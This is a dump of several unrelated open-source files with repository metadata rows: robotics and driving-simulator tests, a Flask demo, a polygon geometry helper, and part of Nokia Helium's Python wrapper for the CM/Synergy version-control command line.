if not os.path.exists(libfile_path):
return
logger.info("Updating lib.rs: " + str(libfile_path))
with open(libfile_path, "w") as libfile:
for child in [f.path for f in os.scandir(libfile_dir)]:
logger.info("child: " + str(child))
modname = os.path.splitext(os.path.basename(child))[0]
if not modname == "lib":
libfile.write("pub mod " + modname + ";")
self.writer.write_newline(libfile)
| 42.25 | 84 | 0.608066 | [
"MIT"
] | JaredWright/pal | pal/generator/rust_generator.py | 6,422 | Python |
from pgdrive.scene_creator.blocks.curve import Curve
from pgdrive.scene_creator.blocks.first_block import FirstBlock
from pgdrive.scene_creator.blocks.straight import Straight
from pgdrive.scene_creator.blocks.t_intersection import TInterSection
from pgdrive.scene_creator.road.road_network import RoadNetwork
from pgdrive.tests.vis_block.vis_block_base import TestBlock
if __name__ == "__main__":
test = TestBlock(True)
from pgdrive.utils.asset_loader import initialize_asset_loader
initialize_asset_loader(test)
global_network = RoadNetwork()
first = FirstBlock(global_network, 3.0, 2, test.render, test.world, 1)
curve = Curve(1, first.get_socket(0), global_network, 1)
curve.construct_block(test.render, test.world)
straight = Straight(2, curve.get_socket(0), global_network, 1)
straight.construct_block(test.render, test.world)
intersection = TInterSection(3, straight.get_socket(0), global_network, 1)
print(intersection.construct_block(test.render, test.world))
id = 4
for socket_idx in range(intersection.SOCKET_NUM):
block = Curve(id, intersection.get_socket(socket_idx), global_network, id + 1)
block.construct_block(test.render, test.world)
id += 1
test.show_bounding_box(global_network)
test.run()
| 40.625 | 86 | 0.766923 | [
"Apache-2.0"
] | gamecraftCZ/pgdrive | pgdrive/tests/vis_block/vis_t_intersection.py | 1,300 | Python |
import unittest
import os
import sys
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), ".."))
from test_utils import check_error_msg
from ppap4lmp import create, StaCustom
class TestStaCustom(unittest.TestCase):
def test_error01(self):
elem = create(StaCustom([{"foo": 1}, {"bar": 2}]))
check_error_msg(
self, "RuntimeError: Invalid key(s) in array data", elem.get_data)
def test_get_data(self):
self._test_get_data({"prop1": 1, "prop2": 0.1})
self._test_get_data(
[{"foo": i, "bar": 0.1*i} for i in range(1000)])
def _test_get_data(self, data):
elem = create(StaCustom(data))
self.assertEqual(data, elem.get_data())
def test_get_keys(self):
self._test_get_keys({"prop1": 1, "prop2": 0.1}, {"prop1", "prop2"})
self._test_get_keys(
[{"A": i, "B": [2*i, i*i]} for i in range(100)], {"A", "B"})
def _test_get_keys(self, data, keys):
elem = create(StaCustom(data))
self.assertEqual(keys, elem.get_keys())
if __name__ == "__main__":
suite = unittest.TestSuite()
suite.addTest(TestStaCustom("test_error01"))
suite.addTest(TestStaCustom("test_get_data"))
suite.addTest(TestStaCustom("test_get_keys"))
runner = unittest.TextTestRunner()
runner.run(suite)
| 24.018868 | 72 | 0.671642 | [
"MPL-2.0"
] | bagayang/ppap4lmp | tests/tests_starter/test_StaCustom.py | 1,273 | Python |
from flask import Flask
from flask import render_template
app = Flask("Boostrap_Demo")
@app.route("/")
def start():
name = "Fabian"
cards = [
{"titel": "Card 0", "inhalt": "Blubber"},
{"titel": "Card 1", "inhalt": "Bla"},
{"titel": "Card 2", "inhalt": "Käsekuchen"},
{"titel": "Card 2", "inhalt": "Sülze"}
]
return render_template("start.html", name=name, cards=cards)
if __name__ == "__main__":
app.run(debug=True, port=5000)
| 23.047619 | 64 | 0.578512 | [
"MIT"
] | fabod/pro2_demos | demo_snippets/15_Bootstrap/main.py | 486 | Python |
"""
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
A simple program which can be used to manually test racecar_utils functionality.
"""
########################################################################################
# Imports
########################################################################################
import math
import sys
sys.path.insert(1, "../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
rc = racecar_core.create_racecar()
RED = ((170, 50, 50), (10, 255, 255))
max_speed = 0
show_triggers = False
show_joysticks = False
########################################################################################
# Functions
########################################################################################
def start():
"""
This function is run once every time the start button is pressed
"""
global max_speed
global show_triggers
global show_joysticks
print("Start function called")
rc.set_update_slow_time(0.5)
rc.drive.stop()
max_speed = 0.25
show_triggers = False
show_joysticks = False
# Test numeric functions
assert rc_utils.remap_range(5, 0, 10, 0, 50) == 25
assert rc_utils.remap_range(5, 0, 20, 1000, 900) == 975
assert rc_utils.remap_range(2, 0, 1, -10, 10) == 30
assert rc_utils.remap_range(2, 0, 1, -10, 10, True) == 10
assert rc_utils.clamp(3, 0, 10) == 3
assert rc_utils.clamp(-2, 0, 10) == 0
assert rc_utils.clamp(11, 0, 10) == 10
# Print start message
print(
">> Test Utils: A testing program for the racecar_utils library.\n"
"\n"
"Controls:\n"
" Right trigger = accelerate forward\n"
" Left trigger = accelerate backward\n"
" Left joystick = turn front wheels\n"
" A button = Take a color image and crop it to the top left\n"
" B button = Take a color image and identify the largest red contour\n"
" X button = Take a depth image and print several statistics\n"
" Y button = Take a lidar scan and print several statistics\n"
)
def update():
"""
After start() is run, this function is run every frame until the back button
is pressed
"""
# Display the color image cropped to the top left
if rc.controller.was_pressed(rc.controller.Button.A):
image = rc.camera.get_color_image()
cropped = rc_utils.crop(
image, (0, 0), (rc.camera.get_height() // 2, rc.camera.get_width() // 2)
)
rc.display.show_color_image(cropped)
# Find and display the largest red contour in the color image
if rc.controller.was_pressed(rc.controller.Button.B):
image = rc.camera.get_color_image()
contours = rc_utils.find_contours(image, RED[0], RED[1])
largest_contour = rc_utils.get_largest_contour(contours)
if largest_contour is not None:
center = rc_utils.get_contour_center(largest_contour)
area = rc_utils.get_contour_area(largest_contour)
print("Largest red contour: center={}, area={:.2f}".format(center, area))
rc_utils.draw_contour(image, largest_contour, rc_utils.ColorBGR.green.value)
rc_utils.draw_circle(image, center, rc_utils.ColorBGR.yellow.value)
rc.display.show_color_image(image)
else:
print("No red contours found")
# Print depth image statistics and show the cropped upper half
if rc.controller.was_pressed(rc.controller.Button.X):
depth_image = rc.camera.get_depth_image()
# Measure average distance at several points
left_distance = rc_utils.get_pixel_average_distance(
depth_image, (rc.camera.get_height() // 2, rc.camera.get_width() // 4),
)
center_distance = rc_utils.get_depth_image_center_distance(depth_image)
center_distance_raw = rc_utils.get_depth_image_center_distance(depth_image, 1)
right_distance = rc_utils.get_pixel_average_distance(
depth_image, (rc.camera.get_height() // 2, 3 * rc.camera.get_width() // 4),
)
print(f"Depth image left distance: {left_distance:.2f} cm")
print(f"Depth image center distance: {center_distance:.2f} cm")
print(f"Depth image raw center distance: {center_distance_raw:.2f} cm")
print(f"Depth image right distance: {right_distance:.2f} cm")
# Measure pixels where the kernel falls off the edge of the photo
upper_left_distance = rc_utils.get_pixel_average_distance(
depth_image, (2, 1), 11
)
lower_right_distance = rc_utils.get_pixel_average_distance(
depth_image, (rc.camera.get_height() - 2, rc.camera.get_width() - 5), 13
)
print(f"Depth image upper left distance: {upper_left_distance:.2f} cm")
print(f"Depth image lower right distance: {lower_right_distance:.2f} cm")
# Find closest point in bottom third
cropped = rc_utils.crop(
depth_image,
(0, 0),
(rc.camera.get_height() * 2 // 3, rc.camera.get_width()),
)
closest_point = rc_utils.get_closest_pixel(cropped)
closest_distance = cropped[closest_point[0]][closest_point[1]]
print(
f"Depth image closest point (upper half): (row={closest_point[0]}, col={closest_point[1]}), distance={closest_distance:.2f} cm"
)
rc.display.show_depth_image(cropped, points=[closest_point])
# Print lidar statistics and show visualization with closest point highlighted
if rc.controller.was_pressed(rc.controller.Button.Y):
lidar = rc.lidar.get_samples()
front_distance = rc_utils.get_lidar_average_distance(lidar, 0)
right_distance = rc_utils.get_lidar_average_distance(lidar, 90)
back_distance = rc_utils.get_lidar_average_distance(lidar, 180)
left_distance = rc_utils.get_lidar_average_distance(lidar, 270)
print(f"Front LIDAR distance: {front_distance:.2f} cm")
print(f"Right LIDAR distance: {right_distance:.2f} cm")
print(f"Back LIDAR distance: {back_distance:.2f} cm")
print(f"Left LIDAR distance: {left_distance:.2f} cm")
closest_sample = rc_utils.get_lidar_closest_point(lidar)
print(
f"Closest LIDAR point: {closest_sample[0]:.2f} degrees, {closest_sample[1]:.2f} cm"
)
rc.display.show_lidar(lidar, highlighted_samples=[closest_sample])
# Print lidar distance in the direction the right joystick is pointed
rjoy_x, rjoy_y = rc.controller.get_joystick(rc.controller.Joystick.RIGHT)
if abs(rjoy_x) > 0 or abs(rjoy_y) > 0:
lidar = rc.lidar.get_samples()
angle = (math.atan2(rjoy_x, rjoy_y) * 180 / math.pi) % 360
distance = rc_utils.get_lidar_average_distance(lidar, angle)
print(f"LIDAR distance at angle {angle:.2f} = {distance:.2f} cm")
# Default drive-style controls
left_trigger = rc.controller.get_trigger(rc.controller.Trigger.LEFT)
right_trigger = rc.controller.get_trigger(rc.controller.Trigger.RIGHT)
left_joystick = rc.controller.get_joystick(rc.controller.Joystick.LEFT)
rc.drive.set_speed_angle(right_trigger - left_trigger, left_joystick[0])
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
rc.set_start_update(start, update, None)
rc.go()
| 41.319149 | 139 | 0.609166 | [
"MIT"
] | MITLLRacecar/racecar-allison-aj | labs/test_utils.py | 7,768 | Python |
import numpy as np
from shapely import geometry
def shrink(coords: np.ndarray, dist: np.ndarray) -> tuple[np.ndarray]:
"""Shrinks a 2D polygon by a given distance.
The coordinates of the polygon are expected as an N x 2-matrix,
and a positive distance results in inward shrinking.
An empty set is returned if the shrinking operation removes all
original elements.
Args:
coords: A matrix of coordinates.
dist: The distance to shrink by.
Returns:
A tuple containing the x, y coordinates of the original set, as
well as the x and y coordinates of the shrunken set, in that
order.
"""
my_polygon = geometry.Polygon(coords)
xy = my_polygon.exterior.xy
my_polygon_shrunken = my_polygon.buffer(-dist)
try:
xys = my_polygon_shrunken.exterior.xy
except AttributeError:
xys = ([0], [0]) # Empty set
return (*xy, *xys)
def hausdorff(A: np.ndarray, B: np.ndarray) -> float:
"""Computes the Hausdorff distance between two 2D polygons.
Args:
A: A matrix defining the first polygon.
B: A matrix defining the second polygon.
Returns:
A float representing the Hausdorff distance.
"""
return geometry.Polygon(A).hausdorff_distance(geometry.Polygon(B))
def read_polygon(file: str) -> np.ndarray:
"""Reads a polygon from a table.
Args:
file: Path to a file containing a plain text, tab-separated
table with scalars.
Returns:
A matrix containing the data in the file.
"""
return np.genfromtxt(file)
if __name__ == "__main__":
import matplotlib as mpl
import matplotlib.pyplot as plt
# Distance to shrink by
dh = 0.01
x, y, xs, ys = shrink(read_polygon('example.txt'), dh)
ax = plt.subplot()
ax.grid(which='major', alpha=0.5, color='k')
ax.grid(which='minor', alpha=0.3, color='k', linestyle=':')
ax.minorticks_on()
ax.set_axisbelow(True)
ax.fill(x, y, color='b', facecolor='lightskyblue',
edgecolor='dodgerblue', label='Original', alpha=0.75)
ax.fill(xs, ys, facecolor='mediumseagreen', edgecolor='forestgreen',
label='Shrunk', alpha=0.75)
ax.set_aspect('equal')
ax.legend()
golden = 0.01017601435813135
assert(np.isclose(
hausdorff(np.vstack([x, y]).T, np.vstack([xs, ys]).T),
golden
))
print("SUCCESS")
print(f'Area original: {geometry.Polygon(np.vstack([x, y]).T).area:.6f}')
print(f'Area shrunk: {geometry.Polygon(np.vstack([xs, ys]).T).area:.6f}')
plt.show() | 28.977778 | 77 | 0.63842 | [
"MIT"
] | helkebir/Reachable-Set-Inner-Approximation | geometry_tools.py | 2,608 | Python |
''' Taking characters from terminal without pressing enter for movements '''
from __future__ import print_function
class AlarmException(Exception):
pass | 31.4 | 76 | 0.802548 | [
"MIT"
] | Megha-Bose/Brick-Breaker-Game | alarmexception.py | 157 | Python |
#============================================================================
#Name : __init__.py
#Part of : Helium
#Copyright (c) 2009 Nokia Corporation and/or its subsidiary(-ies).
#All rights reserved.
#This component and the accompanying materials are made available
#under the terms of the License "Eclipse Public License v1.0"
#which accompanies this distribution, and is available
#at the URL "http://www.eclipse.org/legal/epl-v10.html".
#
#Initial Contributors:
#Nokia Corporation - initial contribution.
#
#Contributors:
#
#Description:
#===============================================================================
""" CM/Synergy Python toolkit.
"""
import logging
import netrc
import os
import re
import subprocess
import sys
import threading
import fileutils
import nokia.gscm
import tempfile
import socket
# Uncomment this line to enable logging in this module, or configure logging elsewhere
_logger = logging.getLogger("ccm")
#logging.basicConfig(level=logging.DEBUG)
VALID_OBJECT_STATES = ('working', 'checkpoint', 'public', 'prep', 'integrate', 'sqa', 'test','released')
STATIC_OBJECT_STATES = ('integrate', 'sqa', 'test','released')
CCM_SESSION_LOCK = os.path.join(tempfile.gettempdir(), "ccm_session.lock")
def _execute(command, timeout=None):
""" Runs a command and returns the result data. """
targ = ""
if timeout is not None:
targ = "--timeout=%s" % timeout
process = subprocess.Popen("python -m timeout_launcher %s -- %s" % (targ, command), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
stdout = process.communicate()[0]
process.wait()
_logger.debug(stdout)
_logger.debug("Return code: %s" % process.returncode)
return (stdout, process.returncode)
class CCMException(Exception):
""" Base exception that should be raised by methods of this framework. """
def __init__(self, reason, result = None):
Exception.__init__(self, reason)
self.result = result
class Result(object):
"""Class that abstracts ccm call result handling.
Subclass it to implement a new generic output parser.
"""
def __init__(self, session):
self._session = session
self.status = None
self._output = None
self._output_str = None
def _setoutput(self, output):
self._output = output
def __setoutput(self, output):
""" Internal function to allow overloading, you must override _setoutput.
"""
# the output is automatically converted to ascii before any treatment
if isinstance(output, unicode):
self._output_str = output.encode('ascii', 'replace')
else:
self._output_str = output.decode('ascii', 'ignore')
_logger.debug("output ---->")
for line in self._output_str.splitlines():
_logger.debug(line)
_logger.debug("<----")
self._setoutput(self._output_str)
def _getoutput(self):
""" Returns the content of _output. """
return self._output
def __str__(self):
""" Synergy output log. """
return self._output_str.encode('ascii', 'replace')
output = property(_getoutput, __setoutput)
class ResultWithError(Result):
def __init__(self, session):
Result.__init__(self, session)
self._error = None
self._error_str = None
def _seterror(self, error):
self._error = error
def __seterror(self, error):
""" Internal function to allow overloading, you must override _seterror.
"""
# the error output is automatically converted to ascii before any treatment
if isinstance(error, unicode):
self._error_str = error.encode('ascii', 'replace')
else:
self._error_str = error.decode('ascii', 'ignore')
_logger.debug("error ---->")
for line in self._error_str.splitlines():
_logger.debug(line)
_logger.debug("<----")
self._seterror(self._error_str)
def _geterror(self):
""" Returns the content of _output. """
_logger.debug("_geterror")
return self._error
error = property(_geterror, __seterror)
class ProjectCheckoutResult(Result):
""" Project checkout output parser.
Sets project to the created project or None if failed.
"""
def __init__(self, session, project):
Result.__init__(self, session)
self.__project = project
self.__result_project = None
def _setoutput(self, output):
""" Parsing the output of the checkout command. """
self._output = output
for line in output.splitlines():
mresult = re.match(r"Saved work area options for project: '(.+)'", line, re.I)
#(?P<name>.+)-(?P<version>.+?)(:(?P<type>\S+):(?P<instance>\S+))?
if mresult != None:
#self.__project.name + "-" + mo.groupdict()['version'] + ":" + self.__project.type + ":" + self.__project.instance
self.__result_project = self._session.create(mresult.group(1))
_logger.debug("ProjectCheckoutResult: project: '%s'" % self.__result_project)
return
def __get_result_project(self):
""" return the checked out project. """
return self.__result_project
project = property(__get_result_project)
class ProjectPurposeResult(Result):
""" Parses purpose query output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = {}
for line in output.splitlines():
mresult = re.match(r"(?P<purpose>.+?)\s+(?P<member_status>\w+)\s+(?P<status>\w+)$", line)
if mresult != None:
data = mresult.groupdict()
if re.match(r'^\s+Purpose\s+Member$', data['purpose'], re.I) == None:
self._output[data['purpose'].strip()] = {'member_status' : data['member_status'].strip(),
'status' : data['status'].strip()
}
class ConflictsResult(Result):
""" Parses purpose query output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = {}
project = None
for line in output.splitlines():
mresult = re.match(r"Project:\s*(.+)\s*$", line)
if mresult != None:
project = self._session.create(mresult.group(1))
self._output[project] = []
mresult = re.match(r"^(.*)\s+(\w+#\d+)\s+(.+)$", line)
if mresult != None and project != None:
self._output[project].append({'object': self._session.create(mresult.group(1)),
'task': self._session.create("Task %s" % mresult.group(2)),
'comment': mresult.group(3)})
mresult = re.match(r"^(\w+#\d+)\s+(.+)$", line)
if mresult != None and project != None:
self._output[project].append({'task': self._session.create("Task %s" % mresult.group(1)),
'comment': mresult.group(2)})
class FinduseResult(Result):
""" Parses finduse query output. """
def __init__(self, ccm_object):
Result.__init__(self, ccm_object.session)
self.__object = ccm_object
def _setoutput(self, output):
self._output = []
for line in output.splitlines():
_logger.debug("FinduseResult: ---->%s<----" % line)
_logger.debug("FinduseResult: ---->%s-%s<----" % (self.__object.name, self.__object.version))
# MCNaviscroll\NaviAnim-username7@MCNaviscroll-username6
mresult = re.match(r"^\s*(?P<path>.+)[\\/]%s-%s@(?P<project>.+)" % (self.__object.name, self.__object.version), line, re.I)
if mresult != None:
data = mresult.groupdict()
_logger.debug("FinduseResult: %s" % data)
project = self._session.create(data['project'])
self._output.append({'path' : data['path'], 'project' : project})
class UpdateTemplateInformation(Result):
""" Parse update template information output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
"""
Baseline Selection Mode: Latest Baseline Projects
Prep Allowed: No
Versions Matching: *abs.50*
Release Purposes:
Use by Default: Yes
Modifiable in Database: tr1s60
In Use For Release: Yes
Folder Templates and Folders:
- Template assigned or completed tasks for %owner for release %release
- Template all completed tasks for release %release
- Folder tr1s60#4844: All completed Xuikon/Xuikon_rel_X tasks
- Folder tr1s60#4930: All tasks for release AppBaseDo_50
"""
self._output = {}
for line in output.splitlines():
rmo = re.match(r"^\s*(.+):\s*(.*)\s*", line)
if rmo != None:
if rmo.group(1) == "Baseline Selection Mode":
self._output['baseline_selection_mode'] = rmo.group(2)
elif rmo.group(1) == "Prep Allowed":
self._output['prep_allowed'] = (rmo.group(2) != "No")
elif rmo.group(1) == "Versions Matching":
self._output['version_matching'] = rmo.group(2)
elif rmo.group(1) == "Release Purposes":
self._output['release_purpose'] = rmo.group(2)
elif rmo.group(1) == "Use by Default":
self._output['default'] = (rmo.group(2) != "No")
elif rmo.group(1) == "Modifiable in Database":
self._output['modifiable_in_database'] = rmo.group(2).strip()
elif rmo.group(1) == "In Use For Release":
self._output['in_use_for_release'] = (rmo.group(2) != "No")
class UpdatePropertiesRefreshResult(Result):
""" Parse update template refresh output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = {'added': [], 'removed': []}
match_added = re.compile(r"^Added the following tasks")
match_removed = re.compile(r"^Removed the following tasks")
match_task_new = re.compile(r"^\s+(Task \S+#\d+)")
section = None
for line in output.splitlines():
res = match_added.match(line)
if res != None:
section = 'added'
continue
res = match_removed.match(line)
if res != None:
section = 'removed'
continue
if section is not None:
res = match_task_new.match(line)
if res != None:
self._output[section].append(self._session.create(res.group(1)))
continue
class UpdateResultSimple(Result):
""" Parse update output. """
def __init__(self, session):
Result.__init__(self, session)
self._success = True
def _setoutput(self, output):
self._output = output
match_failed = re.compile(r"(Update failed)")
for line in output.splitlines():
res = match_failed.match(line)
if res != None:
self._success = False
@property
def successful(self):
return self._success
class UpdateResult(UpdateResultSimple):
""" Parse update output. """
def __init__(self, session):
UpdateResultSimple.__init__(self, session)
def _setoutput(self, output):
self._output = {"tasks":[], "modifications": [], "errors": [], "warnings": []}
match_object_update = re.compile(r"^\s+'(.*)'\s+replaces\s+'(.*)'\s+under\s+'(.*)'\.")
match_object_new = re.compile(r"^\s+(?:Subproject\s+)?'(.*)'\s+is now bound under\s+'(.*)'\.")
match_task_new = re.compile(r"^\s+(Task \S+#\d+)")
match_no_candidate = re.compile(r"^\s+(.+) in project (.+) had no candidates")
match_update_failure = re.compile(r"^\s+Failed to use selected object\s+(.+)\s+under directory\s+(.+)\s+in project\s+(.+)\s+:\s+(.+)")
match_warning = re.compile(r"^Warning:(.*)")
match_failed = re.compile(r"(Update failed)")
# TODO: cleanup the parsing to do that in a more efficient way.
for line in output.splitlines():
_logger.info(line)
res = match_object_update.match(line)
if res != None:
self._output['modifications'].append({ "new": self._session.create(res.group(1)),
"old": self._session.create(res.group(2)),
"project": self._session.create(res.group(3))
})
continue
res = match_object_new.match(line)
if res != None:
self._output['modifications'].append({ "new": self._session.create(res.group(1)),
"old": None,
"project": self._session.create(res.group(2))
})
continue
res = match_task_new.match(line)
if res != None:
self._output['tasks'].append(self._session.create(res.group(1)))
continue
res = match_no_candidate.match(line)
if res != None:
self._output['errors'].append({'family': res.group(1),
'project': self._session.create(res.group(2)),
'comment': "had no candidates",
'line': line,
})
continue
res = match_update_failure.match(line)
if res != None:
self._output['errors'].append({'family': res.group(1),
'dir': self._session.create(res.group(2)),
'project': self._session.create(res.group(3)),
'comment': res.group(4),
'line': line,
})
continue
res = match_warning.match(line)
if res != None:
self._output['warnings'].append({'family': None,
'project': None,
'comment': res.group(1),
'line': line,
})
continue
res = match_failed.match(line)
if res != None:
self._success = False
self._output['errors'].append({'Serious': res.group(1),
})
continue
class WorkAreaInfoResult(Result):
""" Parse work area info output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
""" Returns a dict with the following fields:
* project: a ccm.Project instance
* maintain: a boolean
* copies: a boolean
* relative: a boolean
* time: a boolean
* translate: a boolean
* modify: a boolean
* path: a string representing the project wa path
"""
self._output = None
for line in output.splitlines():
mresult = re.match(r"(?P<project>.*)\s+(?P<maintain>TRUE|FALSE)\s+(?P<copies>TRUE|FALSE)\s+(?P<relative>TRUE|FALSE)\s+(?P<time>TRUE|FALSE)\s+(?P<translate>TRUE|FALSE)\s+(?P<modify>TRUE|FALSE)\s+'(?P<path>.*)'", line)
if mresult != None:
data = mresult.groupdict()
self._output = {'project': self._session.create(data['project']),
'maintain' : data['maintain'] == "TRUE",
'copies' : data['copies'] == "TRUE",
'relative' : data['relative'] == "TRUE",
'time' : data['time'] == "TRUE",
'translate' : data['translate'] == "TRUE",
'modify' : data['modify'] == "TRUE",
'path' : data['path']
}
return
class CreateNewTaskResult(Result):
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = None
for line in output.splitlines():
mresult = re.match(r"Task\s+(?P<task>\S+\#\d+)\s+created\.", line)
if mresult != None:
self._output = self._session.create("Task " + mresult.groupdict()['task'])
return
class AttributeNameListResult(Result):
""" Class that abstract ccm call result handling.
Subclass it to implement a new generic output parser.
"""
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, obj):
def _create(arg):
mresult = re.match(r"^\s*(?P<name>\w+)", arg.strip())
if mresult != None:
return mresult.groupdict()['name']
return None
self._output = [_create(line) for line in obj.strip().splitlines()]
class ObjectListResult(Result):
""" Parses an object list Synergy output. """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, obj):
self._output = []
if re.match(r"^None|^No tasks|^Warning", obj, re.M) != None:
return
def _create(arg):
arg = arg.strip()
if arg != "":
return self._session.create(arg)
return None
result = [_create(line) for line in obj.strip().splitlines()]
for result_line in result:
if result_line != None:
self._output.append(result_line)
class DataMapperListResult(Result):
""" Parses an object list Synergy output. """
dataconv = {'ccmobject': lambda x, y: x.create(y),
'string': lambda x, y: y,
'int': lambda x, y: int(y),
'boolean': lambda x, y: (y.lower() == "true")}
def __init__(self, session, separator, keywords, datamodel):
self._separator = separator
self._keywords = keywords
self._datamodel = datamodel
Result.__init__(self, session)
def format(self):
formatted_keywords = ["%s%s%s%%%s" % (self._separator, x, self._separator, x) for x in self._keywords]
return "".join(formatted_keywords) + self._separator
def regex(self):
regex_keywords = [r'%s%s%s(.*?)' % (self._separator, x, self._separator) for x in self._keywords]
regex = r''.join(regex_keywords)
regex = r"%s%s\s*\n" % (regex, self._separator)
return re.compile(regex, re.MULTILINE | re.I | re.DOTALL | re.VERBOSE | re.U)
def _setoutput(self, obj):
self._output = []
regex = self.regex()
_logger.debug("Regex %s" % (regex.pattern))
for match in regex.finditer(obj):
_logger.debug("Found: %s" % (match))
if match != None:
output_line = {}
for i in range(len(self._datamodel)):
_logger.debug("Found %d: %s" % (i, match.group(i + 1)))
model = self._datamodel[i]
output_line[self._keywords[i]] = self.dataconv[model](self._session, match.group(i + 1))
i += 1
self._output.append(output_line)
class FolderCopyResult(Result):
""" Parses a folder copy result """
def __init__(self, session):
Result.__init__(self, session)
def _setoutput(self, output):
self._output = None
for line in output.splitlines():
mo = re.match(r"appended to", line)
if mo != None:
self._output = self._session.create(line)
return
CHECKOUT_LOG_RULES = [[r'^Derive failed for', logging.ERROR],
[r'^Serious:', logging.ERROR],
[r'^Warning: .* failed.', logging.ERROR],
[r'^Invalid work area', logging.ERROR],
[r'^WARNING:', logging.WARNING],
[r'^Warning:', logging.WARNING],]
UPDATE_LOG_RULES = [[r'^Update failed.', logging.ERROR],
[r'^Serious:', logging.ERROR],
[r'^\s+Failed to', logging.ERROR],
[r'^\d+ failures to', logging.ERROR],
[r"^Warning: This work area '.+' cannot be reused", logging.ERROR],
[r'^Rebind of .* failed', logging.ERROR],
[r'^Warning: .* failed.', logging.ERROR],
[r'^Skipping \'.*\'\. You do not have permission to modify this project.', logging.ERROR],
[r'^Work area conflict exists for file', logging.ERROR],
[r'^Warning: No candidates found for directory entry', logging.ERROR],
[r'^WARNING:', logging.WARNING],
[r'^Warning:', logging.WARNING],]
CONFLICTS_LOG_RULES = [[r'^\w+#\d+\s+Implicit', logging.WARNING],
[r'^(.*)\s+(\w+#\d+)\s+(.+)', logging.WARNING],
[r'.*Explicitly specified but not included', logging.WARNING],]
SYNC_LOG_RULES = [[r'^\s+0\s+Conflict\(s\) for project', logging.INFO],
[r'^\s+\d+\s+Conflict\(s\) for project', logging.ERROR],
[r'^Project \'.*\' does not maintain a workarea.', logging.ERROR],
[r'^Work area conflict exists for file', logging.ERROR],
[r'^Warning: Conflicts detected during synchronization. Check your logs.', logging.ERROR],
[r'^Warning:', logging.WARNING],]
def log_result(result, rules, logger=None):
""" Rules it a list of tuple defining a regular expression and an log level. """
if logger is None:
logger = _logger
crules = []
if rules is not None:
for rule in rules:
crules.append([re.compile(rule[0]), rule[1]])
for line in str(result).splitlines():
for rule in crules:
if rule[0].match(line) != None:
logger.log(rule[1], line)
break
else:
logger.info(line)
class AbstractSession(object):
"""An abstract Synergy session.
Must be overridden to implement either a single session or
multiple session handling.
"""
def __init__(self, username, engine, dbpath, ccm_addr):
self.username = username
self.engine = engine
self.dbpath = dbpath
self._session_addr = ccm_addr
# internal object list
self.__ccm_objects = {}
def addr(self):
""" Returns the Synergy session id."""
return self._session_addr
def database(self):
_logger.debug("AbstractSession: database")
self.__find_dbpath()
_logger.debug("AbstractSession: database: %s" % self.dbpath)
return os.path.basename(self.dbpath)
def __find_dbpath(self):
""" retrieve the database path from current session status. """
_logger.debug("AbstractSession: __find_dbpath")
if (self.dbpath != None):
return
result = self.execute("status")
for match in re.finditer(r'(?:(?:Graphical)|(?:Command)) Interface\s+@\s+(?P<ccmaddr>\w+:\d+(?:\:\d+\.\d+\.\d+\.\d+)+)(?P<current_session>\s+\(current\s+session\))?\s*\nDatabase:\s*(?P<dbpath>\S+)', result.output, re.M | re.I):
d = match.groupdict()
if (d['current_session'] != None):
_logger.debug("AbstractSession: __find_dbpath: Found dbpath: %s" % d['dbpath'])
self.dbpath = d['dbpath']
assert self.dbpath != None
def execute(self, _, result=None):
""" Abstract function that should implement the execution of ccm command
line call.
"""
return result
def create(self, fpn):
""" Object factory, this is the toolkit entry point to create objects from
four part names. Objects are stored into a dictionary, so you have
only one wrapper per synergy object.
"""
result = re.search(r"^(?P<project>.+)-(?P<version>[^:]+?)$", fpn)
if result != None:
matches = result.groupdict()
fpn = "%s-%s:project:%s#1" % (matches['project'], matches['version'], self.database())
_logger.debug("session.create('%s')" % fpn)
ofpn = FourPartName(fpn)
if not self.__ccm_objects.has_key(str(fpn)):
obj = None
if ofpn.type == 'project':
obj = Project(self, fpn)
elif ofpn.type == 'dir':
obj = Dir(self, fpn)
elif ofpn.type == 'task':
obj = Task(self, fpn)
elif ofpn.type == 'folder':
obj = Folder(self, fpn)
elif ofpn.type == 'releasedef':
obj = Releasedef(self, fpn)
else:
obj = File(self, fpn)
self.__ccm_objects[str(fpn)] = obj
return self.__ccm_objects[str(fpn)]
def get_workarea_info(self, dir_):
""" Return a dictionary containing workarea info from directory dir.
"""
if (not os.path.exists(dir_)):
raise CCMException("Error retrieving work_area info for the directory '%s' (doesn't exists)" % dir_)
path = os.path.abspath(os.path.curdir)
path_ccmwaid = os.path.join(dir_,"_ccmwaid.inf");
if(not os.path.exists(path_ccmwaid)):
raise CCMException("No work area in '%s'" % dir_)
os.chdir(dir_)
result = self.execute("wa -show", WorkAreaInfoResult(self))
os.chdir(path)
if result.output == None:
raise CCMException("Error retrieving work_area info for the directory '%s'" % dir_)
return result.output
def _get_role(self):
result = self.execute("set role")
return result.output.strip()
def _set_role_internal(self, role):
""" method to be override by child class else property accession is not working properly. """
if role == None or len(role) == 0:
raise CCMException("You must provide a role.")
result = self.execute("set role %s" % role)
if re.match(r'^Warning:', result.output, re.M) != None:
raise CCMException("Error switching to role %s: %s" %(role, result.output.strip()))
def _set_role(self, role):
self._set_role_internal(role)
role = property(fget=_get_role, fset=_set_role)
def _get_home(self):
result = self.execute("set Home")
return result.output.strip()
def _set_home(self, home):
if len(home) == 0 or home == None:
raise CCMException("You must provide a home.")
result = self.execute("set Home %s" % home)
if re.match(r'^Warning:', result.output, re.M) != None:
raise CCMException("Error switching to Home %s: %s" %(home, result.output.strip()))
home = property(_get_home, _set_home)
def close(self):
pass
def __str__(self):
self.__find_dbpath()
return self._session_addr + ':' + self.dbpath
def __repr__(self):
return self.__str__()
def __del__(self):
self.close()
def purposes(self, role=None):
""" Returns available purposes. """
args = ""
if role != None:
args = "-role \"%s\"" % role
